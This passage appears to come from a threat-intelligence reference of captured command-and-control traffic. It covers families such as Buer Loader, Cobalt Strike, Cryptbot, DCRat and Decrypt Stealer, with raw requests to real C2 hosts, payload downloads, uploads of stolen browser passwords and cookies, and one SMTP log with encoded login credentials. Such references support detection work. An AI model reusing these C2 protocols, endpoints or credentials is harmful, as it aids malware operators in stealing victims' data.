/api/update/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ODM0MjIwNTc5ZGIzNGJiMTMzNWNlMmJlNDJmMjBhMTA5MTVjNWQxZThmN2U0OWJjYjY0ODVjODE4NjQwYjk3YzY0NWU5NjAxNGMxY2U3NWQ2MmI5N2MwY2QzNzlhMmQ2ZmM5ZDFjZjIwNWMwMTEwNWVkNDAyZjY0ZDYyMTg0Y2UyZmJhZmEyYTQxMzBhZWRiNmY0ZjI2ZjFjZmI4MTQwMTBiYzE0Y2Y4NjBiM2U2NGE1NTBhNTc0Y2M4 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: loood1.top HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2019 20:00:24 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive ODMtMkQtNzItMUMtMEQtOTgtREEtOTAtMzktNjUtREYtNzYtRDktQkYtQkYtNUEtMDUtNEMtRjAtRkMtMjAtQzctMEUtQzMtRDAtODYtMzYtRTQtOTktMDAtN0YtRDAtNjQtNDctMzktMkYtRTktMTMtM0MtNDgtNjktNTQtNDEtMTktRjMtNUUtQTItNjgtQTUtMjQtNkEtNEItNzItQ0UtODUtRDQtMDAtQjctMTYtNEItOUItMDQtQzgtMTctN0UtRDgtQzctMDAtM0ItN0ItQzUtQTQtMTYtQUEtM0UtNEEtRjMtRUItNDUtQTctMEItMTctOTEtNUItNTQtNEEtODUtNzctNEEtQjUtRTYtMUMtNTktRDEtODctNDQtQkItMjAtNkQtNTgtQzEtMEEtNEItNEMtRTEtNTItM0MtRTItMkYtNTktOEUtMkUtRjItRDgtRjQtOTgtMUYtRjEtNTEtQzktMTUtNTAtQkEtNDktMkUtMzAtRDMtMjUtRDMtODctNEItQjYtRjUtN0MtMUUtMjQtRTktOTgtM0MtNTYtNjYtRTUtRDctQ0UtMDAtNUQtNkEtODUtMDEtQjEtMkMtQjctODUtMkQtMzItNjItNUEtM0UtRUQtMTYtMDYtMjYtMDYtRDMtOTYtMDMtOUEtOTEtN0MtMTUtOTEtRkYtQUItMDItQzItNzctRTItN0EtNDEtMEEtQjAtMzItOUEtMEYtRjQtMDMtNzAtMUYtMEItNTEtMDktM0EtNzQtQjEtODgtMzEtMUQtREEtQTItRjQtMzktNkUtMTctRDItRDktNTQtRDUtOEYtMDAtQkEtODEtNkUtNEUtMzUtQTMtNTItRkQtODctRTMtRDYtMkMtNTQtODctQTItNjYtQzgtM0MtMzgtQzctMEEtM0EtOUQtOEEtMzAtRTAtMDgtMzItMTAtMDgtRjItQjYtRkUtMUQtQzctQzgtQUUtOEYtNjctQUUtNTItMDUtQTktMTAtQUYtM0MtOEUtMTMtN0EtNzItM0YtMzAtRTktMzUtRDMtNTQtQkEtOEQtQzAtMzItQTctRkItNDUtQTMtNTctRTQtMUItMzAtODItNEYtOTEtOTktMUMtRDItRjgtMkEtMzYtRTItODktQjItQkItMUItNjYtQUMtMUItOEMtNjQtRUEtN0QtQkQtMkMtOTktQ0QtQzQtQkQtNzgtQzgtOUMtQj
AtNkQtNTYtOEUtRDktREEtOTEtMEEtNkMtQUEtQTQtMUUtRTAtQ0MtMzMtRDMtMjAtRTItNjktMjktQzEtRTQtNjEtMTAtMjUtOTgtNjMtOEUtNTgtNzQtRjctNUEtNEYtNDktQzUtNjItNTEtNTAtNTgtNDktM0QtREQtNjctRDctNjEtMTAtMTktRkItNzUtODYtRUItMEYtQzMtRDMtQkQtMjctNkUtQzYtRDktQkYtQUUtNDAtOEEtMUEtMUQtNjctOEMtMjItNjctQjgtNUQtQzItMTUtREQtODMtNzgtNjctN0ItMTMtNDktNzMtRjMtRTAtNEYtMDUtRkYtQjktQ0ItMkEtMDctQkMtRTgtRTMtREQtMUMtNEEtQUQtQjItMTUtNUEtNDMtMTQtQUEtNDEtMUQtNzAtMUEtREQtNTQtMTYtOTAtNjctMTUtNjUtQTgtMjItMTUtMzgtRDYtNjgtOTQtNDMtNDQtQzgtNkQtMUYtNTAtNkMtMTgtMzMtQjUtNzAtOTQtMDQtNzMtRDMtNjQtMTktNDctNjYtNzgtOTEtQkUtQ0ItRTktREItNkQtODgtRkMtOTAtOTk=GET /api/download/YzE0MTY2MGIxZWQ5YzJkMDNmMjQ4MDM0Y2RlZWI2MWM1OTEzYWJmZTIwYWE1OWNjZDFlZjM2ZmZjODViNmVjNTBjNTIyZjY5YjM1MTJiMTc2NzBlNTQwOWFjMWZiZjViZTAzNzdkNWM2NDkxOGE4ZDUwYTMxZjU5ODIzY2QxNTQyMmM5ZGU0Njc4MDI5MWU2NGJhNTYyMDhiMGI4MDlhNDBkNGQ5NjQ2NWQxYjgzNzYwNmIzYjQxZTViZDU4MDE3YjQyZjZmNTVjNg== HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Host: loood1.top HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Nov 2019 20:00:24 GMT Content-Type: application/* Content-Length: 2109952 Connection: keep-alive Last-Modified: Tue, 12 Nov 2019 19:32:38 GMT .}.<,...XG.V.$.-. ..D.o...S..c].ng. .cH!.:2;.~.b..JkP...e.,k...7P.]....._0.&..p.U......=J........9?..J.@. j.^ .h....P.j.S5.q.... h..<.?*u@I^.|.......*..t..5Y.............3.:..v/.(....B.......w.\.|.C............/9...^........F....({..U.{f.c...'......9..%.Z.rJ_.....f....q.#...~..}..... ....k0#.o..............O\....w@..>....E..F.@......4..{#k.hqpxy.....}|....-....B.... 
~~~ ~~~ POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3 Content-Length: 1046 Host: 162.244.81.87 inekece=MDllNzB&diakwadi=iMzE5OG&xycyad=NiNTYxZTcw&ohxiods=MzA0Yj&akreuq=NmZjUy&qosewyic=MzRmMTk5M&amupawel=jdjZGViY&ydsohuu=jljNzMxZDc&orbemaaf=3ZDExMmEx&inhiadfa=ZjA3MG&kyzeafu=UyYzc0M2&alnaexu=M3NGZj&idsavu=Y2VjM2RhO&nyxyygre=GY3YmR&tuxynool=hMmU3Yzc1O&myweka=DNkMDAwYWF&qeozoszi=kOGRlZD&dygyliaz=diNmZkNW&ykdovy=ZiYmVhY&yvabqua=zA4NWEzN&ugsoetl=2Y3ZDk&wymioxi=xNzIwMTIy&uqafsee=Njg1ZTYwNG&cyyqsady=M3NmQwZj&ykuweddy=hkYTQ5ZTV&emlazebe=hYzc5MGVkZ&imirdaby=mJiMzU&doyvku=wYzRhNzQ&roniym=0YTQ5ZDBi&qyaxwe=MTlmZW&uteqop=NkZjdkN2Z&noylke=lNTg5OGJmM&dedynu=DEzNjgxM&suutyfwu=DBkMjFiYm&riitoked=M3NmJjMDg&waliaw=2ZjNhNW&qiubulo=EzZGU2Zm&urehuz=UxNzhjZj&guizpuat=kzYjMzMz&ziapluc=IzODIyYT&orygybib=Y2OGUwY&ebilxufo=2RmYzllM&wesekuy=DVlZThmYTQ&buapxa=3MGVmZDM&lisoxu=xNTlkZ&usgager=TBmOTc4ZDY&cuehlumy=0ZTA5OTZlO&raxyuh=DE2MTA0YWN&piuluwyc=iYjQ4NjE0&gybetez=MzQ3ZW&isvazugo=NhZDExZGEz&obalozha=YmJjZDQ4&pivoewta=NzljOTI&dakiva=xMTE4ND&luzaih=A4OGEz&sesyaci=Mzk0ZWE1YT&opheteow=AxNjQwN&ebzyluo=zBkZWYy&osfiuk=ODc2&yzxaob=NDVmMTViNjdkZDli&exmuur=suirufy ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer.png "Buer Loader") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/buer2.png "Buer Loader") #### Cannibal RAT (aka Ares) ~~~ POST /api/admin_90520735581359/hello HTTP/1.1 Host: 35.192.197.199:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.18.4 Content-Length: 69 Content-Type: application/json {"username": "admin", "platform": "Windows 7", "hostname": "User-PC"} ~~~ ~~~ POST /api/admin_90520735581359/report HTTP/1.1 Host: 35.192.197.199:8080 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: 
*/* User-Agent: python-requests/2.18.4 Content-Length: 26301 Content-Type: application/x-www-form-urlencoded output=%24+%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22%0A++%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%0A%3Chtml%3E%0A++%3Chead%3E%0A++++%3Ctitle%3ETypeError%3A+unsupported+operand+type%28s%29+for+%2B%3A+%27NoneType%27+and+%27str%27+%2F%2F+Werkzeug+Debugger%3C%2Ftitle%3E%0A++++%3Clink+rel%3D%22stylesheet%22+href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dstyle.css%22%0A++++++++type%3D%22text%2Fcss%22%3E%0A++++%3C%21--+We+need+to+make+sure+this+has+a+favicon+so+that+the+debugger+does%0A+++++++++not+by+accident+trigger+a+request+to+%2Ffavicon.ico+which+might%0A+++++++++change+the+application+state.+--%3E%0A++++%3Clink+rel%3D%22shortcut+icon%22%0A++++++++href%3D%22%3F__debugger__%3Dyes%26amp%3Bcmd%3Dresource%26amp%3Bf%3Dconsole.png%22%3E%0A+++ HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: Ares Date: Thu, 21 Nov 2019 22:54:05 GMT ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cannibal.png "Cannibal RAT") #### Coala Bot Uses fake 404 ~~~ POST /jjj888/skghn.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/12.0.1576.62 Safari/537.26 Content-Type: application/x-www-form-urlencoded Host: 185.170.43.187 Content-Length: 120 Expect: 100-continue Connection: Close HTTP/1.1 100 Continue Jk1pY3Jvc29mdCBXaW5kb3dzIDcgUHJvZmVzc2lvbmFsIHgzMiZhZG1pbiY4NjNCLUJFQUItOEZDNi0yMEJGLTlDMDktMkY1NS01OEUxLUExRDYmRmFsc2U( HTTP/1.0 404 Not Found Date: Tue, 15 Jan 2019 13:20:17 GMT Server: Apache/2.4.10 (Debian) Set-Cookie: PHPSESSID=euhbs94osbalc0ubsfl5c2v324; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 88 Connection: close Content-Type: text/html; charset=UTF-8 
MTAzNDE2MzR0MTdoYWhkQkZ1amRmYnd1cmhmbmllZmhydWZoYm5maGdmeVREZmJHRlZ5V2d2ZnwxNTQ3NTU4NDE3 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/coala.png "Coala Bot") #### Cobaltstrike ~~~ GET /Mdt7 HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; NP06) Host: 198.199.89.56 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 16 Oct 2019 00:03:32 GMT Content-Type: application/octet-stream Content-Length: 213589 ....... w.z....=..........C.D.'.'Z.2....:1....R..1...1.......1.9.t...^.......3.Q.3.R.~...~..........6a..6a-L^.............................................`.....W...?...O...=...^...1...T...:.......:..._...U...U...U.v.......v......,9 .W.E.3k..a....9..l.T..k...........J......;J.._.k...$......J....h...'..qD GET /push HTTP/1.1 Accept: */* Cookie: TwJl1o2Nzk3+xmC39FsNTbyJPGHyNxllFZ8wZUwR831SYmTwrxoGydXQGF1ej89K1t0rTLgzjd95c8127hlZ6SQ4hx95YrYuRHooitXYGEAxtbKv53LJ6K+6r1y1OQU3n0+O93xxPiyx6RvPeKzlACbO4nEc5YKzh0vAfWJvlm0= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA) Host: 198.199.89.56 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Wed, 16 Oct 2019 00:05:35 GMT Content-Type: application/octet-stream Content-Length: 0 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltstrike.png "Cobaltstrike") Amazon c2 profile ~~~ GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Host: www.amazon.com Accept: */* Cookie: skin=noskin;session-token=MM4bZQ5WUPUrn7TPQuCWct6G+WGXZaLdezMQVEv8PHnB7tnvTk7ct3W71pQmn2NMJQD7IFbjPnKJV27tKshA8AjgzpXoeUtOIrDiBEg0x3AesYq52s74IbjnsVA+wASo0D6L23fd87XNDUiBro5wNBzcybUOADAO1fjCobw5MAw=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Date: Fri, 13 Dec 2019 17:48:39 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT 
x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Content-Length: 0
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobaltamazon.png "Cobaltstrike")

Safebrowsing c2 profile

~~~
GET /safebrowsing/ref/eNKSXUTdWXGYAMHYg2df0Ev1wVrA7yp0T-WrSHSB53oha HTTP/1.1
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip
Host: novote.azureedge.net
Cookie: PREF=ID=foemmgjicmcnhjlacgackacadbclcmnfoeaeeignjhiphdgidlmahkgbchcahclpfcadjnegckejpiofbmllpnaeancgbikcdjohkekapgnkgiijobnknkgiahmkcjipnncehcamnopcmlngcboppjdplhhobhgekdcblgpkdggeklenpcabdkhhhaedogkacljhdgdphfanfbmcbnkgjmplhdkomllhnnoppchchejooiplahpgpmfaegdcpbnd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 1609
Alternate-Protocol: 80:quic
Cache-Control: public,max-age=172800
Content-Type: application/vnd.google.safebrowsing-chunk
Date: Fri, 22 Nov 2019 13:34:50 GMT
Server: ECAcc (frb/67BC)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 82480
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobalt-safe.png "Cobaltstrike safebrowsing")

#### Cobian RAT

~~~
...........................LOGIN|-|ROOT02_392170|-|JONATHAN-PC@Jonathan|-|Microsoft Windows 7 Professional |-|No|-|1.0.20.0 [Black]|-|Program Manager|-|ROOT02_392170,goodattack.duckdns.org,4007,svchost.exe,{VYFGJQ0V-30663-BEMNQX-BEMNQX0BNF},TEMP,False,False,|-|.
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cobian.png "Cobian RAT")

#### Collector Project

~~~
GET /get_data.php?info HTTP/1.1
User-Agent: CLCTR
Host: u667503gif.ha004.t.justns.ru
Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 66
Date: Fri, 24 Apr 2020 16:45:45 GMT
Server: LiteSpeed
Vary: User-Agent

IP-address: 85.203.44.133_=_Country: Netherlands_=_City: Amsterdam

POST /get_data.php?id=1874255356&cc=0&pc=1&hash=8f41bab4341b7ac42eb623fad118f430 HTTP/1.1
Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
User-Agent: uploader
Host: u667503gif.ha004.t.justns.ru
Content-Length: 1191921
Connection: Keep-Alive
Cache-Control: no-cache

--SendFileZIPBoundary
Content-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"
Content-Type: application/zip

PK...........P.w..B*..........Screenshot.pngUT ...%.^.%.^.%.^$.uXS........n. .......P........!.H...}. *9JB....5:Fm0.........:;...9.....W,...!= .O_c.).c.....y>...k...?u...n.5..........k...../...#*.........pt]3.n\g...?PK...........P....I...........Browsers/passwords.txtUT ...%.^.%.^.%.^. ..R.())(.....KKLNM....K.......O.......V:.....y........R...@..../W<.....PK...........P ...7...........Browsers/AutoFill.txtUT ...%.^.%.^.%.^.K.M.Rp.,*...2y...sJ."..IE..9.\...^.?..>.hF.%..e...Sd6.PK...........P................Browsers/!browsersInfo.txtUT ...%.^.%.^.%.^.............\.c..)....v.. -N-*.IL....q,(pI,I...ON..q..O.I.q.(..M..S.....%....U.g...b.tu.....K.J...cy.x...;......... .........Cc...&a...Q^ ru..qv$&F.PK...........P..m. ...}.......information.txtUT ...%.^.%.^.%.^-.Oo.0......|..D4.?. u 6UP."....x..6U.`.../..|...Y/q...UV.J(..g ...8.r.....!.k.`.Y.)$s.NC........{.+..$.2c.......&..*........Q.U..l....&..^+M_Jk..~..?......D}pd]..Qm...w.X.........6...OW.s6c ..
/.`..w..U9*..?..o.}.Q..1|Ver-3.1||||C:\ProgramData\Dhrolas\|subdomain.....getavs=avpro.....subdomain-getavs=@....264>smss>0><352>explorer>0><796>svchost>0><348>csrss>0><1232>svchost>0><608>svchost>0><3720>windanr>0><692>svchost>0><708>ctfmon>0><864>svchost>0><1872>SearchIndexer>0><3520>SearchFilterHost>0><1384>IMEDICTUPDATE>0><404>csrss>0><1204>spoolsv>0><3484>SearchProtocolHost>0><1824>svchost>0><396>wininit>0><840>svchost>0><1460>qemu-ga>0><2704>audiodg>0><1000>svchost>0><1944>886c394c284f3f334c0e385fe36ec1022037585810b9e39629fcbdc2ac4d27e1>0><464>lsm>0><552>winlogon>0><1352>svchost>0><280>dwm>0><1080>svchost>0><456>lsass>0><4>System>0><448>services>0><2032>taskeng>0><0>Idle>0><
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/crimson.png "Crimson RAT")

#### Cryptbot

~~~
POST /index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------j3v66jdmskc244S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: saas01.pro
Content-Length: 50253
Cache-Control: no-cache

-----------------------------j3v66jdmskc244S
Content-Disposition: form-data; name="file"; filename="C:\ProgramData\AaZ2SXQu2BSEGVOA\SS5KbUwQhOLk.zip"
Content-Type: application/octet-stream

PK.........S_O\...........4...Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT .....]...]...]..KO.@......SZ...hg. ..!<..n.<..P.....^.n.....|....7.W}:..=..e.....4Yl..S.\I..n...z......C..G.....F.,O....*..]gg........<.t>.=.......fY..ce2...Uo..t...6..$!.$...q<. ..y.KF. p.h$.$..V.Ht".,../.-K.'T..p..B[c........?...&.S.."...b.J.T......(...!B.E1...D\!*N.!....PK.........S_O..K.............Browsers/_FileCookies.txtUT .....]...]...]..KO.@.......t.....%&H"...J.!3S.0.60......;......ht.\x.}5.....b/...=...|3a. .Zi.v...0...pj....=.]..<...........D...g=o.5..!..}...M..k..s......Y1,7........&.s.
....W.G..yn*F.$...$...wN.LL.J,%.(.-K}A.......q..h.J....?T.M...'.L)!".JK...p7..?.A!o...Ql8l....Z...0.}.PK.........S_OFq..O...h.......Browsers/_FileForms.txtUT .....]...]...].K.M.Rp.,*...2...j.8,1..(...T.......V...MQPbJQfz~1/./.SQ~yqj...o~UfNN"..... ^..PK.........S_OE.%.{...........Browsers/_FilePasswords.txtUT .....PA..N6.....).......a.?.C.........g.|......kiQ......^.."./.......:.R.y...7...]}.45.{.D..S]......d*nY.q!.3........P.R.C.....G.B ."...;.o.5....iU.;....$}._..&...e@...wF..PK...........S_O\...........4. ....... .......Browsers/Cookies/Mozilla_Firefox_Cookies_fmcIYbZ.txtUT......]PK...........S_O..K........... ....... ...g...Browsers/_FileCookies.txtUT......]PK...........S_OFq..O...h..... ....... .......Browsers/_FileForms.txtUT......]PK...........S_OE.%.{......... ....... ...I...Browsers/_FilePasswords.txtUT......]PK...........S_OE.%.{......... ....... ......._FilePasswords.txtUT......]PK...........S_O..... ..Fk.. . ....... ......._Info.txtUT......]PK...........S_O..=mK......... ....... ......._Screen.jpgUT......]PK..........&.........
-----------------------------j3v66jdmskc244S--

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 31 Oct 2019 10:30:07 GMT
Content-Length: 3
Connection: keep-alive
X-Powered-By: Express

ok!
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/cryptbot.png "Cryptbot")

#### Danabot

Not real TLS traffic; flag on the "24 01 00 00" pattern and a 24-byte first packet.

~~~
00000000 24 01 00 00 00 00 00 00 e5 7c 00 00 00 00 00 00 $....... .|......
00000010 09 7e 00 00 00 00 00 00 .~......
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/danabot.png "Danabot")

#### Darkcloud-fg

~~~
220-sg2plzcpnl456444.prod.sin2.secureserver.net ESMTP Exim 4.95 #2 Mon, 06 Feb 2023 08:00:59 -0700
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
EHLO DESKTOPJGLLJLD
250-sg2plzcpnl456444.prod.sin2.secureserver.net Hello DESKTOPJGLLJLD [45.86.200.53]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
aW5mb0BrcmlvbmNvbXB1dGVyLmNvbQ==
334 UGFzc3dvcmQ6
cWhyVlNDSyYm
235 Authentication succeeded
MAIL FROM:
250 OK
RCPT TO:
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
thread-index: Adk6O9KSWRF117oSS/+EnKkCJKo7kA==
Thread-Topic: DC-FG:::DESKTOP-JGLLJLD\admin\45.86.200.110
From:
To:
Subject: DC-FG:::DESKTOP-JGLLJLD\admin\45.86.200.110
Date: Mon, 6 Feb 2023 15:00:59 -0000
Message-ID: <4A2332A508DC4B61B8ACDBC8A9CD1E68@DESKTOPJGLLJLD>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0000_01D93A3B.D2A2B3E0"
X-Mailer: Microsoft CDO for Windows 2000
Content-Class: urn:content-classes:message
Importance: normal
Priority: normal
X-MimeOLE: Produced By Microsoft MimeOLE

This is a multi-part message in MIME format.
------=_NextPart_000_0000_01D93A3B.D2A2B3E0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

------=_NextPart_000_0000_01D93A3B.D2A2B3E0
Content-Type: application/x-zip-compressed; name="Files.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Files.zip"

UEsDBBQAAAAIANaRa090OBjdswQAADkMAAAZAAAARmlsZXMvYXV0aG9yZ2FsbGVyaWVzLnJ0Zq1W
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcloud-fg.png "Darkcloud-fg")

#### Darkcomet

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkcomet.png "Darkcomet")

#### Darkrat

~~~
POST /request HTTP/1.1
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: agent
Host: 104.244.75.179
Content-Length: 640

request=YUhkcFpEMDVNREExT1dNek55MHhNekl3TFRReFlUUXRZalU0WkMweVlqYzFZVGs0TlRCa01tWW1ZMjl0Y0hWMFpYSnVZVzFsUFZWVFJWSXRVRU1tWVc5eWJtOTBQV1poYkhObEptbHVjM1JoYkd4bFpGSmhiVDB6TGpRNU9UWXhPU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDEwY25WbEptRnVkR2wyYVhKMWN6MG1ZbTkwZG1WeWMybHZiajB5TGpJdU1DWm5jSFZPWVcxbFBXUkhPV3RpZHowOUptTndkVTVoYldVOVUxYzFNRnBYZDI5VmFXdG5VVEk1ZVZwVGFGVlVVMnRuWVZSVmRFNXFVWGROUTBKRVZVWlZaMUZEUVhsTWFtTjNVakJvTmlaaGNtTm9QV1ZFWnpJbWIzQmxjbWx1WjNONWMzUmxiVDFXTW14MVdrYzVNMk41UVROSlJrNXNZMjVhY0ZreVZXZFZSMFpxWVhsQmVDWnpjSEpsWVdSMFlXYzljR0ZzYVhkaA==

HTTP/1.1 200 OK
Date: Tue, 08 Oct 2019 11:25:25 GMT
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=hikrbr50pt7ggjr4rcbg40bvl6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/darkrat.png "Darkrat")

#### DCRat

~~~
GET /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/56743785cf97084d3a49a8bf0956f2c744a4a3e0.php?data=active HTTP/1.1
Host: domalo.online
Connection: Keep-Alive

GET /ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/212bad81b4208a2b412dfca05f1d9fa7.php?type=__ds_setdata&__ds_setdata_user=552b13e67562d7b564b8a0ac9f35c735d17c786b&__ds_setdata_ext=2dce65292845e5dbc41d772bf7f1866e&__ds_setdata_data=%3CSTR%3Esmss.exe%3CSTR%3Esvchost.exe%3CSTR%3Ewinlogon.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Elsm.exe%3CSTR%3Eqemu-ga.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Eexplorer.exe%3CSTR%3ESearchProtocolHost.exe%3CSTR%3Elsass.exe%3CSTR%3Ectfmon.exe%3CSTR%3Edwm.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Eservices.exe%3CSTR%3EWmiPrvSE.exe%3CSTR%3Ewininit.exe%3CSTR%3Espoolsv.exe%3CSTR%3Efsdffc.exe%3CSTR%3ESearchIndexer.exe%3CSTR%3ESearchFilterHost.exe%3CSTR%3Ewindanr.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Etaskeng.exe%3CSTR%3ESystem.exe%3CSTR%3Esvchost.exe%3CSTR%3EIdle.exe HTTP/1.1
Host: domalo.online
~~~

![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dcrat.png "DCRat")

#### Decrypt Stealer

~~~
POST /gate.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accepts-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------8d7f030923bcd86
Host: geroipanel.site
Content-Length: 1282596
Expect: 100-continue
Connection: Keep-Alive

-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="platform"

0
-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="profile"

0
-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="cccount"

0
-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="fcount"

0
-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="ccount"

0
-----------------------------8d7f030923bcd86
Content-Disposition: form-data; name="logs"; filename="bVYyP5uHP5ea.zip"
Content-Type: zip

PK.........l.P................Desktop Files\PK.........l.P............ ...Passwords.txtPK.........l.P............0...Browsers\AutoFill\Unknown_Microsoft_Autofill.txtPK.........l.P............1...Browsers\Cards\Unknown_Microsoft_Credit_Cards.txtPK.........l.P............2...Browsers\Cookies\Default_Google_Chrome_Cookies.txtPK.........l.P............5...Browsers\Cookies\qldyz51w.default_Firefox_Cookies.txtPK.........l.Pz7q)............Browsers\Cookies\Unknown_Microsoft_Cookies.txt..1..0.... ..........bA.Q....4.)....t.!.-..1.^.e.. {....E..%Q..G.P.F...t)...z.. Mp{.%C..........6...!.L....<...........F.>W.PD...07....>.T_@..........PK.........l.P ^..~...C...4...Browsers\Cookies\Unknown_Steam_htmlcache_Cookies.txt..A .0.E...J.I.8..[. .N..8%.(xz........{<-....1..p...H2.8)....YD.w. 